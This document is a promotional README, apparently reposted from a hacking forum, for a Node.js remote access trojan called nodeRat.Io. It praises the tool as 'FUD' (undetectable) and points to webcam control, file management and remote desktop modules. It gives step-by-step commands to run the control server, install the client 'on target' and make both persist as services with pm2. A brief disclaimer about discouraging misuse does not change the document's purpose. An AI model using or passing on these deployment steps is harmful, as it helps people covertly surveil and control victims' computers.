Advantages:
- Code once run on all OS (cloud and client).
- Easy to code (its only javascript).
- Easy to get help and code in team with git.
- Easy to edit and test.
- No need encryption its FUD.
- No need compilation.
- No need Apache or PHP to run the cloud.
- Lot of module exist on nodejs, we can manage them with npm and take benefit from all this repository in a few second:
- Imagine we need to get controle on webcam, just search "nodejs wecam" on google and we often get module of high quality like this.
- Need a file manager ? or an exemple to make your own ? https://www.npmjs.com/package/node-file-manager
- A remote desktop ? https://github.com/citronneur/node-rdpjs
- etc... We take advantage of one of the bigest comunity of javascript developer to add new functionality easier.
Disadvantages:
- Code of client is readable (not compiled) so anyone can reverse your client to get information on you: ip, general password, etc. in clear with notepad ^^, so it will be harder to use it for illegal activity and its better like this, it will discourage lamers to spread this as malware :)
- Size of client (when is compiled) is big (from 12mb with Enclosejs to 80mb with NWjs).
- Need mysql server to run the cloud.
- Need nodejs environment to run the client.
How to install (Web Server )
Start and configure the cloud (web server) of the rat is simple you will see (same methode work on all OS).
The web server is the web control plaform to remote controle all the client.
Here is how to install and start it:
- Install NodeJS and NPM : https://nodejs.org/en/
- Install MySql.
- Clone the depot from git : https://github.com/mwesto/nodeRat.Io
- Use the dump of database located here : "nodeRat.Io/_database/noderatio.sql" to create the database.
- Open a terminal and go in "nodeRat.Io/cloud" then write "npm install" to download all plugin required to run the cloud.
- Already in terminal write "node server.js" to run the cloud.
- Open your browser and go at http://127.0.0.1:8080/
- Login as admin with demo@demo.com:123456
- To config the connexion to database and port of webserver you can edit : "nodeRat.Io/cloud/routes/config.js"
To demonize and put the cloud as service (auto restart if server stop, reboot crash) we can use pm2:
- Install pm2 with npm: npm install -g pm2
- Start the cloud with pm2: "pm2 start server.js --name NodeRatIoCloud" (the cloud is now demonized it will restart if crash append)
- To save the process demonized as service just write : "pm2 save" (cloud will now restart automaticaly after a reboot)
- To stop the process demonized : pm2 stop NodeRatIoCloud
- To get list of process demonized with lot of info : pm2 list
- To see logs of process : pm2 logs NodeRatIoCloud
Note: If you want you can use forever it almost the same of pm2 its how you want but pm2 is pretty better because it can be link with keymetrics.
How to install ( Client )
Here is how install and configure the client of the rat (located in "nodeRat.Io/client")
Manual install (work on all OS) not compiled (easy to reverse):
- Install NodeJS and NPM on target: https://nodejs.org/en/
- Open a terminal and go in "nodeRat.Io/client" then write "npm install" to download all plugin required to run the client.
- Install pm2 : npm install -g pm2
- Start client : pm2 start server.js --name name-of-processs
- Stop client : pm2 stop name-of-processs
- Put as service: pm2 save
- To see logs of process : pm2 logs name-of-processs
Download Node.Js Rat : https://github.com/mwesto/nodeRat.Io
Download Node.Js Rat : https://github.com/mwesto/nodeRat.Io
Source & Credit : Mwesto